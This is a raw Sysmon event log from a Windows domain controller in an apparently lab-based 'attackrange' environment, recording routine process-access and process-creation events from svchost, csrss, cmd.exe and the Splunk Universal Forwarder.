13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3701-000000009101}5048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.932{10ACEC4A-85EB-5FCF-3601-000000009101}47204872C:\Windows\system32\cmd.exe{10ACEC4A-85EB-5FCF-3701-000000009101}5048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.934{10ACEC4A-85EB-5FCF-3701-000000009101}5048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85EB-5FCF-3601-000000009101}4720C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3601-000000009101}4720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3601-000000009101}4720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.916{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EB-5FCF-3601-000000009101}4720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.928{10ACEC4A-85EB-5FCF-3601-000000009101}4720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.854{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85EB-5FCF-3501-000000009101}3192C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.854{10ACEC4A-85EB-5FCF-3501-000000009101}31924396C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3501-000000009101}3192C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNE